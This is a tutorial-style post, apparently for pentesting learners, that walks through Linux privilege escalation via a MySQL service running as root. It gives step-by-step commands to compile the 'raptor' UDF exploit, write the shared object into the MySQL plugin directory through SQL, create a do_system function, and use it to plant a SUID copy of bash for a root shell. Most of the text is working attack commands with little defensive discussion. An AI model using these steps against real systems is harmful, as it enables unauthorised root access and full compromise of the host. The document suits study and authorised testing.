Linux Privilege Escalation — MySQL Service UDF Exploit

MySQL provides multiple ways to execute shell commands directly on the system. Here we are going to exploit using the user defined function.

Once you gain initial access to the machine, you need to verify that the MySQL service is running as the root user and that you can log in without a password as the root user. Alternatively, you can proceed if you have the root user’s password.

ps aux | grep mysql
mysql -u root

MySQL service run in root user

login MySQL service in root user without password

We can use a popular exploit ‘raptor’ that leverages User Defined Functions (UDFs) to execute system commands as the root user through the MySQL service. Before proceeding with the exploit, we need to compile it and convert it into a shared object, similar to a DLL on a Windows machine service.

OffSec's Exploit Database Archive

gcc -g -c raptor_udf2.c -fPIC
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

exploit c file converted into shared object.

As a typical user, we usually do not have write access to ‘/usr/lib/mysql/plugin/’. In this scenario, we are going to write the shared object file using the MySQL service. We selected the ‘mysql’ database within the SQL service that is available in my compromised machine, created a table named ‘foo,’ inserted the converted shared object file into the ‘foo’ table, then wrote the file into the MySQL plugin directory at ‘/usr/lib/mysql/plugin/’, and created a new function named ‘do_system’ using the written shared object file.

use mysql;
Select * from mysql.func;  #to list the user defined functions

list the databases and user defined functions.

create table foo(line blob);
insert into foo values(load_file('/home/user/tools/mysql-udf/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';

creating new user defined function in MySQL

Using the created ‘do_system’ function, we copy the ‘/bin/bash’ binary to ‘/tmp/rootbash’ and modify the permissions of ‘/tmp/rootbash’ to make it executable with the group SUID (Set User ID) permission.

select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');

Copying root bin/bash to tmp folder

Afterward, you can run the ‘/tmp/rootbash’ executable with the ‘-p’ option to obtain a shell running with root privileges.

/tmp/rootbash -p

Gaining root user privilege

㊙️Follow us on our below official handles for future updates:

sekkio_LinkedIn, sekkio_X, sekkio_Insta, sekkio_Medium, sekkio_Gitbook